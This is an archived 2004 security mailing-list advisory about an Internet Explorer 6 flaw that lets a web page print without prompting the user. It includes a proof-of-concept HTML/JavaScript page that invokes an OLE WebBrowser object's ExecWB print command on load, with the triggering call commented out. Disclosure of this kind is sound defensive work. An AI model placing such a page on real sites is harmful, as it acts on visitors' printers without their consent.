[NT] Internet Explorer Print without Prompting

• Previous message: SecuriTeam: "[NT] MSWebDVD Class (mswebdvd.dll) Null Pointer Assignment"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 19 Apr 2004 17:56:31 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Internet Explorer Print without Prompting
------------------------------------------------------------------------

SUMMARY

Microsoft Internet Explorer is the dominant web browser in the world, used
by millions of people. Internet Explorer allows a malicious user to send
pages to a connected printer without it being prompted for user
intervention. The vulnerability can be exploited by using JavaScript, HTML
and OLE.

DETAILS

Vulnerable Systems:
 * Internet Explorer version 6

Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious
document to send pages to the printer without prompting the user. An
example page that exploits the vulnerability is given below. The offending
line must be commented out in order for the page to work, so are any
linebreaks that break the JavaScript code.

<HTML>
<HEAD>
<SCRIPT language="JavaScript">
function ieExecWB( intOLEcmd, intOLEparam )
{
        // Create OLE Object
         var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0
         CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';

          // Place Object on page
          document.body.insertAdjacentHTML('beforeEnd', WebBrowser);

         // if intOLEparam is not defined, set it
          if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || ( intOLEparam
> 1) )
           intOLEparam = 1;

         // Execute Object
          WebBrowser1.ExecWB( intOLEcmd, intOLEparam );

          // Destroy Object
          WebBrowser1.outerHTML = "";
}

function printAll()
{
        // Uncomment this to enable the exploit!
        //ieExecWB(6,-1);
}
</SCRIPT>
</HEAD>
<BODY onload="printAll()">
<h3>I like your PRINTER</h3>
</BODY>
</HTML>

ADDITIONAL INFORMATION

The information has been provided by <mailto:bengarvey@comcast.net> Ben
Garvey.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] MSWebDVD Class (mswebdvd.dll) Null Pointer Assignment"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]